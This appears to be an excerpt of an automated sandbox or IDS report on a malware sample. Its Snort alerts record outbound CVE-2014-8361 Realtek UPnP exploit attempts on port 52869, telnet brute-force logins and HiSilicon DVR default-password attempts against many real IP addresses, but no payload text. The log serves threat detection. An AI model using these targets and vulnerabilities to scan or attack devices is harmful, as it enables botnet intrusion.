Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47576 -> 185.241.252.195:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47576 -> 185.241.252.195:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47580 -> 185.241.252.195:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37576 -> 45.115.241.89:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 119.30.125.89:23 -> 192.168.2.23:34128
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57268 -> 45.117.146.255:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57268 -> 45.117.146.255:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36362 -> 45.42.95.151:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36362 -> 45.42.95.151:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57280 -> 45.117.146.255:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43114 -> 91.196.177.82:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43114 -> 91.196.177.82:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43116 -> 91.196.177.82:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33830
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:36120
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:36120
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46914 -> 91.78.48.185:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:46914 -> 91.78.48.185:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:46920 -> 91.78.48.185:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60562 -> 45.254.26.54:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60562 -> 45.254.26.54:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33830
Source: Traffic Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:51632
Source: Traffic Snort IDS: 716 INFO TELNET access 177.99.192.113:23 -> 192.168.2.23:39268
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56192 -> 45.115.239.156:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56192 -> 45.115.239.156:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54188 -> 91.134.128.105:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54188 -> 91.134.128.105:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 125.139.34.17:23 -> 192.168.2.23:44928
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 125.139.34.17:23 -> 192.168.2.23:44928
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44286 -> 45.115.230.151:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44286 -> 45.115.230.151:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 211.106.163.145:23 -> 192.168.2.23:33906
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59516 -> 45.154.3.151:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59516 -> 45.154.3.151:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45684 -> 45.84.91.69:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45684 -> 45.84.91.69:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45720 -> 45.84.91.69:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59278 -> 45.41.92.219:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59278 -> 45.41.92.219:52869
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:33906 -> 211.106.163.145:23
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60496 -> 91.78.92.2:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60496 -> 91.78.92.2:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60500 -> 91.78.92.2:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37288
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37288
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42414 -> 45.120.184.166:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42414 -> 45.120.184.166:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60976 -> 45.33.247.154:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60976 -> 45.33.247.154:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42422 -> 45.120.184.166:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35644 -> 91.77.97.169:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35644 -> 91.77.97.169:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35650 -> 91.77.97.169:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52460 -> 185.65.162.239:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52460 -> 185.65.162.239:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 211.106.163.145:23 -> 192.168.2.23:33906
Source: Traffic Snort IDS: 492 INFO TELNET login failed 177.99.192.113:23 -> 192.168.2.23:39268
Source: Traffic Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36274 -> 12.45.41.169:23
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 12.45.41.169:23 -> 192.168.2.23:36274
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 12.45.41.169:23 -> 192.168.2.23:36274
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57762 -> 45.33.247.132:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57762 -> 45.33.247.132:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59036 -> 45.43.239.57:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59036 -> 45.43.239.57:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37358
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37358
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36068 -> 45.115.236.166:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36068 -> 45.115.236.166:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 37.85.164.81:23 -> 192.168.2.23:51632
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 37.85.164.81:23 -> 192.168.2.23:51632
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56546 -> 45.33.254.144:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56546 -> 45.33.254.144:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 121.184.41.14:23 -> 192.168.2.23:46498
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 121.184.41.14:23 -> 192.168.2.23:46498
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 186.72.40.225:23 -> 192.168.2.23:49738
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 186.72.40.225:23 -> 192.168.2.23:49738
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52502 -> 185.65.162.239:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 177.99.192.113:23 -> 192.168.2.23:39516
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 82.59.59.187:23 -> 192.168.2.23:60526
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 82.59.59.187:23 -> 192.168.2.23:60526
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52666 -> 185.159.88.230:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52666 -> 185.159.88.230:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47726 -> 45.26.216.149:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47726 -> 45.26.216.149:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54196 -> 45.138.86.14:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:54196 -> 45.138.86.14:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47740 -> 45.26.216.149:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52034 -> 45.121.56.32:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52034 -> 45.121.56.32:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:54220 -> 45.138.86.14:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35252 -> 185.245.153.210:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35252 -> 185.245.153.210:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35262 -> 185.245.153.210:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 212.27.0.202:23 -> 192.168.2.23:52160
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 212.27.0.202:23 -> 192.168.2.23:52160
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 14.230.54.11:23 -> 192.168.2.23:52210
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 14.230.54.11:23 -> 192.168.2.23:52210
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52678 -> 185.159.88.230:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37442
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37442
Source: Traffic Snort IDS: 716 INFO TELNET access 109.51.137.51:23 -> 192.168.2.23:37204
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56620 -> 91.200.121.176:52869
Source: Traffic Snort IDS: 492 INFO TELNET login failed 177.99.192.113:23 -> 192.168.2.23:39516
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33478 -> 45.113.163.120:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33478 -> 45.113.163.120:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:59420 -> 45.117.146.173:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:59420 -> 45.117.146.173:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52612 -> 185.65.160.77:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52612 -> 185.65.160.77:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52622 -> 185.65.160.77:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56056 -> 45.125.108.165:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56056 -> 45.125.108.165:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39224 -> 45.121.82.154:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39224 -> 45.121.82.154:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49382 -> 185.229.200.184:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49382 -> 185.229.200.184:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49440 -> 185.229.200.184:52869
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 32.217.104.198:23 -> 192.168.2.23:37654
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 32.217.104.198:23 -> 192.168.2.23:37654
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33586 -> 45.115.238.200:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33586 -> 45.115.238.200:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45342 -> 45.125.109.243:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45342 -> 45.125.109.243:52869
Source: Traffic Snort IDS: 716 INFO TELNET access 37.85.164.81:23 -> 192.168.2.23:52076
Source: Traffic Snort IDS: 1251 INFO TELNET Bad Login 109.51.137.51:23 -> 192.168.2.23:37204
Source: Traffic Snort IDS: 718 INFO TELNET login incorrect 109.51.137.51:23 -> 192.168.2.23:37204
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41784 -> 45.43.227.59:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41784 -> 45.43.227.59:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48424 -> 185.19.81.228:52869
Source: Traffic Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:48424 -> 185.19.81.228:52869
Source: Traffic Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:48428 -> 185.19.81.228:52869
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 47692 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52122 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52126 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52122
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52126
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42036 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 42038 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52784 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52786 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52784
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 52786
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45784 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45862 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45708 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45714 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 45708
Source: unknown Network traffic detected: HTTP traffic on port 52869 -> 45714
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59518 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59300 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59310 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57730 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57732 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54512 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 43672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50926 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50932 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40374 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 51942 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51944 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60100 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46092 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46104 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52182 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37666 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59902 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 57570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37324 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53760 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45842 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54998 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45018 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40570 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44888 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 52652 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 57492 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37806 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46196 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51728 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54088 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 46204 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 55986 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 44882 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37802 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 53216 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 51126 -> 52869
